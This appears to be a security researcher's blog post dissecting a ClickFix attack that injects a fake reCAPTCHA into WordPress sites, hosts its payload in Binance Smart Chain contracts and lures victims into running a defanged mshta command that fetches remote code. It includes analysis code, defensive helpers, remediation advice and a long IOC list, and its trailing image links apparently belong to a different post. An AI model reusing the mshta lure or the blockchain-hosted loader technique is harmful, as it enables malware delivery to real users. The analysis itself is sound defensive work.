







ClickFix refers to a manipulative tactic in which attackers trick users into clicking malicious elements (links, buttons, pop-ups, or fake system alerts) and then running attacker-supplied commands themselves, often a command the page has silently copied to their clipboard, under the guise of fixing a problem such as a security issue, software error, or account access problem. This type of social engineering attack exploits human psychology by creating a sense of urgency or fear, pressuring victims into taking immediate (but harmful) action.

Stage 1 – Injection of a Malicious Base64 Blob















In the first stage, the “reCAPTCHA” window looks no different from a real one. However, it blocks all interaction with the website until the user clicks the checkbox, at which point it displays the “ClickFix” window. Following the steps in the “ClickFix” window leads the victim to run this command: mshta.exe https[:]//check[.]bibyn[.]icu/gkcxv[.]google?i=xxxxxxxxxx # Нυmаn, nоt а гοbоt: ϹΑРТСНА Ⅴегіfіϲаtіоп ΙD:xxxx

Note that the word “Ⅴегіfіϲаtіоп” is not written in plain Latin letters: the attacker substituted Cyrillic and other non-Latin lookalike characters (homoglyphs) to evade security controls that match on IoC strings.
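A quick way to surface such homoglyphs when triaging a captured command is to list every non-ASCII character it contains. The helper below (‘findNonAscii’, a hypothetical name) is a minimal sketch for that purpose; it does not identify which script a character belongs to, it simply flags anything outside the ASCII range.

```javascript
// Hypothetical triage helper: list every non-ASCII character in a string,
// with its Unicode code point, so homoglyphs such as Cyrillic "е" (U+0435)
// hidden in an otherwise Latin-looking word stand out.
function findNonAscii(text) {
  const hits = [];
  let index = 0;
  for (const ch of text) { // for...of walks code points, not UTF-16 units
    const cp = ch.codePointAt(0);
    if (cp > 0x7f) {
      hits.push({
        index, // position in code points
        char: ch,
        codePoint: "U+" + cp.toString(16).toUpperCase().padStart(4, "0"),
      });
    }
    index += 1;
  }
  return hits;
}

// Usage: a plain-ASCII word yields no hits; the lure text yields several.
console.log(findNonAscii("Verification").length); // 0
console.log(findNonAscii("Ⅴегіfіϲаtіоп").map((h) => h.codePoint).join(" "));
```

Running every pasted command line through a check like this is cheap, and any hit inside a word that looks like English is a strong hint of deliberate obfuscation.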

Figure 1 – Fake reCAPTCHA

Figure 2 – Fake ClickFix

The malicious code was embedded in the webpage as a Base64 blob, which makes it easy to spot when viewing the page source.

Figure 3 – HTML contains Base64-encoded blob in script tag





I decoded the Base64 blob, but unfortunately the result is heavily obfuscated JavaScript. The most important part is the asynchronous function shown in Figure 5.

Figure 4 – Obfuscated Code

Figure 5 – Deobfuscated Asynchronous Function

The ‘isWindows’ variable checks whether the victim is running Windows by testing ‘navigator.userAgent’ for “Windows NT”. If it is, the script proceeds to execute the asynchronous ‘load_()’ function. When I tested this in a Linux environment, the windows shown in Figure 1 and Figure 2 did not pop up, although the embedded Base64 blob could still be found in the page source.

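```javascript
// Only Windows visitors are served the fake reCAPTCHA/ClickFix overlay.
const isWindows = /Windows NT/.test(navigator.userAgent);
if (isWindows) {
  load_(); // asynchronous loader that fetches and runs the stage 2 payload
}
```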



Let’s look at the ‘load_()’ function. It connects to a Binance Smart Chain (BSC) testnet node (data-seed-prebsc-1-s1.xxxx.org:xxxx) and queries a suspicious smart contract (0x80d31D935f0…) through an Ethereum JSON-RPC call (eth_call). The script fetches hex-encoded data from the contract, converts it into raw bytes, and extracts a hidden payload stored on the blockchain. After reading the payload’s offset and length, it decodes the data from Base64 (using atob) and executes it dynamically with eval, giving the attacker arbitrary JavaScript execution in the victim’s browser.
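For reference, eth_call is an ordinary JSON-RPC 2.0 request, and BSC nodes expose the same JSON-RPC interface as Ethereum. The sketch below only builds the request body; ‘buildEthCallBody’ is a hypothetical name, and the address and calldata in the usage line are placeholders because the real values are redacted above.

```javascript
// Hypothetical helper: build the JSON-RPC 2.0 body for a read-only eth_call.
// `to` is the contract address; `data` is the ABI-encoded calldata
// (4-byte function selector plus arguments).
function buildEthCallBody(to, data, id = 1) {
  if (!/^0x[0-9a-fA-F]{40}$/.test(to)) {
    throw new Error("contract address must be 0x followed by 40 hex digits");
  }
  if (!/^0x([0-9a-fA-F]{2})*$/.test(data)) {
    throw new Error("calldata must be 0x-prefixed whole bytes");
  }
  return JSON.stringify({
    jsonrpc: "2.0",
    id,
    method: "eth_call",
    // The second param is the block tag; "latest" reads current contract state.
    params: [{ to, data }, "latest"],
  });
}

// Usage with placeholder values (not the real contract or selector):
const body = buildEthCallBody("0x" + "00".repeat(20), "0x12345678");
console.log(body);
```

Such a body is sent as an HTTP POST with Content-Type: application/json to the node’s RPC endpoint; the hex-encoded return data comes back in the response’s “result” field. Because eth_call is read-only, it costs nothing and leaves no transaction on chain, which makes it attractive for hosting payloads.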

I also queried the BSC smart contract myself. In the “result” field of the response, the first 32 bytes after the 0x prefix are an offset pointer and the next 32 bytes are the length of the payload, which is consistent with the standard Solidity ABI encoding of a dynamic return value such as a string.
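The offset/length layout can be decoded with a few lines of code. This is a minimal sketch assuming the contract returns a single dynamic value (string or bytes) in the standard ABI layout; ‘decodeAbiDynamic’ is a hypothetical helper, and the sample input is hand-built, not the real response.

```javascript
// Hypothetical helper: decode the `result` hex of an eth_call that returns one
// dynamic value. Layout: [32-byte offset] ... at offset: [32-byte length][data].
function decodeAbiDynamic(resultHex) {
  const hex = resultHex.startsWith("0x") ? resultHex.slice(2) : resultHex;
  if (hex.length % 2 !== 0) throw new Error("odd-length hex");
  const bytes = Uint8Array.from(hex.match(/../g) || [], (pair) => parseInt(pair, 16));
  // Read a 32-byte big-endian word as a Number (fine for realistic sizes).
  const readWord = (pos) => {
    if (pos + 32 > bytes.length) throw new Error("truncated ABI data");
    let value = 0;
    for (let i = pos; i < pos + 32; i++) value = value * 256 + bytes[i];
    return value;
  };
  const offset = readWord(0);      // first word: where the value starts
  const length = readWord(offset); // word at offset: payload length in bytes
  const start = offset + 32;
  if (start + length > bytes.length) throw new Error("length past end of data");
  return bytes.slice(start, start + length);
}

// Usage: a hand-built result encoding the 4-byte string "aGk=" (Base64 of "hi").
const word = (n) => n.toString(16).padStart(64, "0");
const sample = "0x" + word(32) + word(4) + "61476b3d".padEnd(64, "0");
const text = new TextDecoder().decode(decodeAbiDynamic(sample));
console.log(text); // aGk=
```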

Figure 6 – Result of calling BSC smart contract

Stage 2 – JavaScript Payload



Decoding the payload from hex yields a Base64 string, and decoding that string produces JavaScript functions along with several more Base64 blobs. These inner blobs contain the HTML, CSS, and JavaScript logic for the fake “reCAPTCHA” and “ClickFix” windows described at the beginning of this blog.
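The two decoding layers can be peeled off without executing anything. The Node.js sketch below is a hypothetical analysis helper, not the attacker’s code: it decodes the outer Base64 into script text, then decodes any quoted Base64 literal of at least 16 characters (an arbitrary threshold) found inside it.

```javascript
// Hypothetical analysis helper (Node.js): decode a Base64 payload to text, then
// decode long Base64 string literals inside it. Nothing is executed.
function decodeBase64Text(b64) {
  return Buffer.from(b64, "base64").toString("utf8");
}

function decodeNestedBlobs(outerB64, minLength = 16) {
  const script = decodeBase64Text(outerB64);
  // Quoted runs of Base64 alphabet characters, optionally "=" padded.
  const literal = new RegExp("[\"'`]([A-Za-z0-9+/]{" + minLength + ",}={0,2})[\"'`]", "g");
  const inner = [];
  for (const match of script.matchAll(literal)) {
    inner.push(decodeBase64Text(match[1]));
  }
  return { script, inner };
}

// Usage with a self-made two-layer sample (not the real payload):
const innerB64 = Buffer.from("<div>fake captcha</div>").toString("base64");
const outerB64 = Buffer.from(`const html = "${innerB64}";`).toString("base64");
const result = decodeNestedBlobs(outerB64);
console.log(result.inner[0]); // <div>fake captcha</div>
```

Returning the decoded text instead of passing it to eval is the whole point: the payload is meant to be read, not run.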

Figure 7 – Decoded Base64 Payload

Figure 8 – Decoded payload from Base64







Figure 9 – Clear Payload JS

The ‘setCookie(e, t, n)’ function creates or updates a cookie with a given name, value, and optional expiration time. The ‘e’ parameter is the cookie name and ‘t’ is the value to store; if ‘t’ is empty, the cookie value is set to an empty string. The ‘n’ parameter specifies the number of days until the cookie expires. If ‘n’ is null, the cookie becomes a session cookie, meaning it expires when the browser is closed. The cookie is written in the format ‘[name]=[value]; expires=[date]; path=/’, where ‘path=/’ makes the cookie accessible on all pages of the domain.
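The behaviour described above can be sketched as follows. This is a reconstruction from the description, not the payload’s code: ‘buildCookie’ is a hypothetical name, it returns the cookie string instead of assigning it to document.cookie so it runs outside a browser, and the injectable ‘now’ parameter exists only for testing.

```javascript
// Sketch of the cookie string setCookie(e, t, n) is described as writing.
function buildCookie(name, value, days, now = new Date()) {
  let expires = "";
  if (days) { // null/undefined/0: no expires attribute, so a session cookie
    const expiry = new Date(now.getTime() + days * 24 * 60 * 60 * 1000);
    expires = "; expires=" + expiry.toUTCString();
  }
  return name + "=" + (value || "") + expires + "; path=/";
}

const fixedNow = new Date(Date.UTC(2025, 0, 1));
console.log(buildCookie("csj_id", "abc", 2, fixedNow));
// csj_id=abc; expires=Fri, 03 Jan 2025 00:00:00 GMT; path=/
console.log(buildCookie("csj_id", "", null)); // csj_id=; path=/
```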

Figure 10 – setCookie func



The ‘getCookie(e)’ function retrieves the value of a cookie by name. It searches all available cookies and, if it finds a match, decodes the value and returns it.
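A minimal sketch of that lookup, applied to a cookie string rather than document.cookie so it can run anywhere. ‘getCookieFrom’ is a hypothetical name, and returning null when nothing matches is an assumption; the payload’s exact return value may differ.

```javascript
// Sketch of a getCookie-style lookup over a "name=value; name2=value2" string.
function getCookieFrom(cookieString, name) {
  for (const part of cookieString.split(";")) {
    const pair = part.trim();
    const eq = pair.indexOf("=");
    if (eq === -1) continue; // skip malformed entries
    if (pair.slice(0, eq) === name) {
      return decodeURIComponent(pair.slice(eq + 1)); // decode %XX escapes
    }
  }
  return null; // not found (assumed behaviour)
}

console.log(getCookieFrom("theme=dark; csj_id=1234%2Dab", "csj_id")); // 1234-ab
```

Comparing the full name, rather than using a substring search, avoids matching a different cookie whose name merely ends with the one requested.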

Figure 11 – getCookie func

The ‘getUserID’ function tries to read an existing user ID from the “csj_id” cookie. If none exists, it generates a new UUIDv4, stores it in that cookie, and returns it. Because the cookie expires after 2 days, the same ID persists across browser sessions for that period.
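The sketch below models that flow outside a browser. It is a hypothetical reconstruction based on the description, not the payload’s code: a Map stands in for document.cookie, and the ID generator and clock are passed in so the 2-day expiry can be exercised.

```javascript
// Sketch of the getUserID flow: reuse the "csj_id" value while it is unexpired,
// otherwise create a new ID and keep it for 2 days.
const TWO_DAYS_MS = 2 * 24 * 60 * 60 * 1000;

function getUserID(store, generateId, now = Date.now()) {
  const entry = store.get("csj_id");
  if (entry && entry.expiresAt > now) {
    return entry.value; // existing ID survives browser restarts until expiry
  }
  const id = generateId();
  store.set("csj_id", { value: id, expiresAt: now + TWO_DAYS_MS });
  return id;
}

// Usage with a deterministic generator:
let counter = 0;
const nextId = () => `id-${++counter}`;
const jar = new Map();
console.log(getUserID(jar, nextId, 0));               // id-1 (created)
console.log(getUserID(jar, nextId, 1000));            // id-1 (reused)
console.log(getUserID(jar, nextId, TWO_DAYS_MS + 1)); // id-2 (expired, replaced)
```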

Figure 12 – getUserID func



The ‘generateUUIDv4’ function generates a random version 4 UUID (Universally Unique Identifier) as defined in RFC 4122.
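For reference, a common JavaScript idiom for producing an RFC 4122 version 4 UUID is shown below; the payload’s own implementation (Figure 13) may differ. The version nibble is fixed to 4 and the variant nibble is forced into the range 8 to b.

```javascript
// Common idiom for an RFC 4122 version 4 UUID. Math.random() is not a
// cryptographically secure source: acceptable for a tracking ID, not secrets.
function generateUUIDv4() {
  return "xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g, (c) => {
    const r = (Math.random() * 16) | 0;        // random nibble 0..15
    const v = c === "x" ? r : (r & 0x3) | 0x8; // "y": variant bits 10xx -> 8..b
    return v.toString(16);
  });
}

// Version nibble is always 4; variant nibble is one of 8, 9, a, b.
const V4_PATTERN = /^[0-9a-f]{8}-[0-9a-f]{4}-4[0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}$/;
console.log(V4_PATTERN.test(generateUUIDv4())); // true
```

Modern browsers and Node.js also provide crypto.randomUUID(), which produces the same format from a secure random source.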

Figure 13 – generateUUIDv4 func







The ‘isGoalReached()’ function queries a different Binance Smart Chain (BSC) contract address (0x7d0b5A06Fxxxxxxxxx) from the one mentioned earlier in this blog. It checks whether that contract holds a record for the victim’s UUID. If such a record exists, it means the victim has run the malicious command described at the beginning: “mshta.exe https[:]//check[.]bibyn[.]icu/gkcxv[.]google?i=xxxxxxxxxx # Нυmаn, nоt а гοbоt: ϹΑРТСНА Ⅴегіfіϲаtіоп ΙD:xxxx”. As highlighted in the code, the function returns true or false depending on whether the record is found. As seen in the ‘stageClipboard()’ function, ‘isGoalReached()’ is called every second; once it returns true, the function removes the fake reCAPTCHA and ClickFix windows and displays the legitimate website content. This is how the page keeps the victim from interacting with the website until they complete the fake “reCAPTCHA” verification.
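The once-per-second check can be sketched as a small polling loop. This is an illustrative reconstruction under assumptions: ‘checkReached’ stands in for ‘isGoalReached()’, and the error handling and optional attempt cap are additions for this sketch rather than details recovered from the payload.

```javascript
// Illustrative polling loop: call an async check every `intervalMs` until it
// resolves to true, then resolve with the number of checks made.
function pollUntilReached(checkReached, intervalMs = 1000, maxAttempts = Infinity) {
  return new Promise((resolve, reject) => {
    let attempts = 0;
    const tick = async () => {
      attempts += 1;
      try {
        if (await checkReached()) {
          resolve(attempts);
          return;
        }
      } catch (err) {
        // Treat a failed lookup (e.g. an RPC error) as "not reached yet".
      }
      if (attempts >= maxAttempts) {
        reject(new Error("gave up"));
        return;
      }
      setTimeout(tick, intervalMs);
    };
    tick();
  });
}

// Usage with a fake check that "succeeds" on the third poll:
let calls = 0;
pollUntilReached(async () => ++calls >= 3, 10).then((n) => {
  console.log(`reached after ${n} checks`); // reached after 3 checks
  // The real script would now remove the fake reCAPTCHA/ClickFix container.
});
```

Scheduling the next tick only after the previous check settles avoids overlapping RPC calls when the node answers slowly.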

Figure 14 – isGoalReached func

Figure 15 – stageClipboard func





Another interesting aspect is a conditional tracking mechanism that is triggered when ‘isGoalReached()’ indicates the victim has not completed the fake reCAPTCHA verification. In that case, the script first modifies the display properties of the container holding the HTML, CSS, and JavaScript logic for the fake reCAPTCHA and ClickFix windows. It then dynamically loads the Yandex Metrika analytics script, which provides click tracking, link interaction logging, and bounce rate measurement. This suggests that the attacker wants to analyse and record the behaviour of suspicious visitors or potential bots, since victims who pass the verification bypass this tracking entirely.
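The conditional loading can be sketched as follows. The three behaviours listed likely correspond to Metrika’s ‘clickmap’, ‘trackLinks’ and ‘accurateTrackBounce’ initialisation options. The loader URL below is Metrika’s public tag.js address and is assumed rather than copied from the payload; ‘maybeLoadTracker’ is a hypothetical name, and the container’s display change is omitted because its exact values are not described.

```javascript
// Hypothetical sketch of conditional tracker loading. `doc` is injected so the
// logic can run against a stub; in a browser it would be `document`.
const METRIKA_SRC = "https://mc.yandex.ru/metrika/tag.js";

function maybeLoadTracker(goalReached, doc, src = METRIKA_SRC) {
  if (goalReached) {
    return null; // visitors who ran the command are never tracked
  }
  const script = doc.createElement("script");
  script.async = true; // load without blocking page rendering
  script.src = src;
  doc.head.appendChild(script);
  // Metrika's standard snippet also calls ym(<counterId>, "init", {...}).
  return script;
}

// Usage in a browser: maybeLoadTracker(false, document);
```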

Figure 16 – Yandex Tracking

Figure 17 – Container for reCAPTCHA/ClickFix Windows



The ‘commandToRun’ variable holds the command that is injected into the victim’s clipboard. As we can see, this command differs from the mshta.exe command shown at the beginning of this post. By the time I began investigating and downloaded the payload, two weeks had passed since I first encountered the compromised website and the malicious Base64 blob from stage 1, which suggests that the threat actor actively changes the malicious commands over time. In both cases, the command includes a UUID.
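Because the command changes over time, defenders may prefer to match its shape rather than an exact string. The sketch below is a hypothetical defensive check, not part of the malware: it refangs indicators written in this post’s “[.]” / “[:]” style, looks for mshta launching a remote URL, and reports whether the host or one of its parent domains is a listed IOC. It only covers mshta-style commands; the newer command in Figure 18 may use a different launcher.

```javascript
// Hypothetical defensive check for ClickFix-style command lines.
function refang(indicator) {
  return indicator.replace(/\[\.\]/g, ".").replace(/\[:\]/g, ":");
}

function checkMshtaCommand(commandLine, defangedDomains) {
  const iocs = new Set(defangedDomains.map((d) => refang(d).toLowerCase()));
  const m = /\bmshta(?:\.exe)?\s+(https?:\/\/[^\s#"']+)/i.exec(refang(commandLine));
  if (!m) return { suspicious: false };
  let host;
  try {
    host = new URL(m[1]).hostname.toLowerCase();
  } catch (e) {
    return { suspicious: true, reason: "mshta with an unparsable URL" };
  }
  // Walk parent domains: check.bibyn.icu -> bibyn.icu (stop before the TLD).
  const labels = host.split(".");
  for (let i = 0; i < labels.length - 1; i++) {
    const candidate = labels.slice(i).join(".");
    if (iocs.has(candidate)) {
      return { suspicious: true, reason: `IOC match: ${candidate}`, host };
    }
  }
  // mshta fetching remote content is suspicious even without an IOC hit.
  return { suspicious: true, reason: "mshta launching a remote URL", host };
}

// Usage against the stage 1 command (defanged as in this post):
console.log(checkMshtaCommand(
  "mshta.exe https[:]//check[.]bibyn[.]icu/gkcxv[.]google?i=xxxxxxxxxx # ...",
  ["bibyn[.]icu", "dafeq[.]icu"]
).reason); // IOC match: bibyn.icu
```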

Figure 18 – commandToRun



The two BSC contracts mentioned in this blog were created on December 8, 2024, at 10:13:07 PM UTC and on December 19, 2024, at 06:14:56 PM UTC. At the time of writing (April 26, 2025), the blockchain explorer still shows incoming transactions to both contract addresses, indicating that the attack is still active in the wild.

Figure 19 – Transactions of BSC 1

Figure 20 – Transactions of BSC 2

Is the phishing finished? No, it’s just getting started! This post concludes the investigation of stages 1 and 2, but I will soon publish a follow-up that examines which malware the malicious commands found here ultimately deliver.

Recommendations for WordPress Website Owners

- Review all theme/plugin files (especially header.php, footer.php) for Base64-encoded blobs.

- If a compromise is found, restore from a clean backup, after verifying that the backup is free of injected code.

- Monitor for suspicious blockchain-related connections, such as JSON-RPC calls to BSC testnet nodes.

- Review suspicious commands that contain the malicious links mentioned in this blog.
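For the first recommendation, a rough first pass can be automated. The sketch below is a hypothetical helper, not a complete scanner: it looks for script blocks containing a long unbroken Base64 run, like the blob in Figure 3, and notes whether the block also calls atob or eval. The 200-character threshold is an arbitrary assumption, and Base64 split across lines or assembled from concatenated strings will be missed.

```javascript
// Hypothetical triage helper: report <script> blocks in a theme/plugin file
// that contain a long unbroken Base64 run, and whether they call atob/eval.
function findBase64Scripts(fileText, minRun = 200) {
  const findings = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  const base64Re = new RegExp("[A-Za-z0-9+/]{" + minRun + ",}={0,2}");
  for (const m of fileText.matchAll(scriptRe)) {
    const run = base64Re.exec(m[1]);
    if (run) {
      findings.push({
        offset: m.index,             // where the <script> tag starts in the file
        base64Length: run[0].length, // length of the suspicious run
        callsAtobOrEval: /\b(?:atob|eval)\s*\(/.test(m[1]),
      });
    }
  }
  return findings;
}

// Usage (Node.js):
// findBase64Scripts(require("fs").readFileSync("header.php", "utf8"));
```

A hit is only a lead: legitimate themes occasionally inline Base64 images or fonts, so each finding still needs a manual look, but a long Base64 run next to atob or eval deserves immediate attention.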

IOCs Tracking



























Because the domains in both malicious commands host the same malicious file, I searched for other domains hosting that file and discovered 69 of them. All of these domains were registered in April.

Figure 21 – bibyn[.]icu

Figure 22 – dafeq[.]icu

IOCs



bojut[.]press (104.21.85[.]163)

tahip[.]press (104.21.51[.]2)

farav[.]press (104.21.15[.]206)

biwiv[.]press (172.67.169[.]223)

becel[.]press (104.21.58[.]223)

tafoz[.]press (104.21.4[.]71)

cabym[.]press (172.67.155[.]53)

zipuk[.]press (104.21.4[.]99)

qeqek[.]press (172.67.205[.]184)

matur[.]press (172.67.210[.]89)

vekeq[.]icu (104.21.64[.]1)

pybal[.]icu (104.21.16[.]1)

vogos[.]press (104.21.16[.]1)

cogov[.]press (104.21.48[.]1)

kenut[.]press (104.21.94[.]77)

habyg[.]press (104.21.1[.]119)

lizyf[.]top (172.67.147[.]11)

sylaj[.]top (172.67.223[.]186)

muhoj[.]top (104.21.17[.]72)

rugyg[.]top (172.67.198[.]6)

napiv[.]press (104.21.32[.]1)

bobab[.]press (104.21.96[.]1)

xuvyc[.]top (104.21.17[.]89)

kuqob[.]top (172.67.183[.]157)

vezof[.]press (104.21.112[.]1)

hikig[.]press (104.21.80[.]1)

qegyx[.]press (104.21.32[.]1)

pypim[.]icu (104.21.3[.]234)

lupuj[.]icu (172.67.139[.]97)

jahoc[.]icu (172.67.180[.]251)

wunep[.]icu (172.67.220[.]144)

pepuq[.]icu (104.21.83[.]40)

gyner[.]icu (104.21.52[.]197)

tazaz[.]icu (104.21.48[.]1)

hobir[.]icu (104.21.48[.]1)

hylur[.]icu (104.21.80[.]1)

rocyg[.]icu (104.21.47[.]253)

vynen[.]icu (104.21.17[.]99)

gutom[.]icu (104.21.76[.]147)

cuxer[.]icu (104.21.64[.]1)

gubuj[.]icu (104.21.19[.]188)

piver[.]icu (172.67.167[.]45)

ginoz[.]icu (172.67.147[.]138)

vyzap[.]icu (172.67.183[.]195)

pebeg[.]icu (172.67.156[.]170)

dafeq[.]icu (172.67.188[.]123)

tycok[.]icu (172.67.161[.]196)

kasej[.]icu (172.67.163[.]83)

palid[.]icu (104.21.12[.]142)

junyk[.]icu (172.67.174[.]128)

nynoj[.]icu (172.67.192[.]141)

fukuq[.]icu (172.67.178[.]51)

mysyv[.]icu (172.67.136[.]91)

nuxul[.]icu (104.21.56[.]253)

juhup[.]icu (104.21.34[.]230)

nuwof[.]icu (104.21.24[.]9)

vaboz[.]icu (172.67.134[.]101)

buqoc[.]icu (172.67.176[.]187)

pivum[.]icu (172.67.193[.]161)

faqyw[.]icu (172.67.210[.]146)

carin[.]icu (172.67.210[.]237)

check[.]letoq[.]icu (104.21.44[.]51)

letoq[.]icu (104.21.44[.]51)

check[.]pivum[.]icu (172.67.193[.]161)

check[.]carin[.]icu (172.67.210[.]237)

check[.]pikip[.]icu (172.67.142[.]86)

pikip[.]icu (172.67.142[.]86)

check[.]juket[.]icu (104.21.32[.]239)

juket[.]icu (104.21.32[.]239)

kajec[.]icu (104.21.32[.]171)

pejel[.]icu (104.21.5[.]91)

check[.]pejel[.]icu (104.21.5[.]91)


![Figure 17. 104[.]21[.]42[.]150 info from VirusTotal Figure 17. 104[.]21[.]42[.]150 info from VirusTotal](/assets/img/posts/the-anatomy-of-a-phishing-investigation-how-attackers-exploit-health-related-fears/Figure-18.-104.21.42.150-info-from-VirusTotal.png)

![Figure 18. 172[.]67[.]163[.]10 info from VT Figure 18. 172[.]67[.]163[.]10 info from VT](/assets/img/posts/the-anatomy-of-a-phishing-investigation-how-attackers-exploit-health-related-fears/Figure-19.-172.67.163.10-info-from-VT.png)



![Figure 20. 209[.]59[.]155[.]176 info from Virustotal Figure 20. 209[.]59[.]155[.]176 info from Virustotal](/assets/img/posts/the-anatomy-of-a-phishing-investigation-how-attackers-exploit-health-related-fears/Figure-21.-209.59.155.176-info-from-Virustotal.png)

![Figure 25. IP 104[.]21[.]96[.]1 info from Virustotal Figure 25. IP 104[.]21[.]96[.]1 info from Virustotal](/assets/img/posts/the-anatomy-of-a-phishing-investigation-how-attackers-exploit-health-related-fears/Figure-26.-IP-104.21.96.1-info-from-Virustotal.png)

![Figure 26. Malicious IPs in ip range 104[.]20[.]0[.]0/15 Figure 26. Malicious IPs in ip range 104[.]20[.]0[.]0/15](/assets/img/posts/the-anatomy-of-a-phishing-investigation-how-attackers-exploit-health-related-fears/Figure-27.-Malicious-IPs-in-ip-range-104.20.0.015.png)



![Figure 28. 199[.]188[.]100[.]170 info from VT Figure 28. 199[.]188[.]100[.]170 info from VT](/assets/img/posts/the-anatomy-of-a-phishing-investigation-how-attackers-exploit-health-related-fears/Figure-29.-199.188.100.170-info-from-VT.png)

![Figure 29. 199[.]188[.]100[.]166 info from VT Figure 29. 199[.]188[.]100[.]166 info from VT](/assets/img/posts/the-anatomy-of-a-phishing-investigation-how-attackers-exploit-health-related-fears/Figure-30.-199.188.100.166-info-from-VT.png)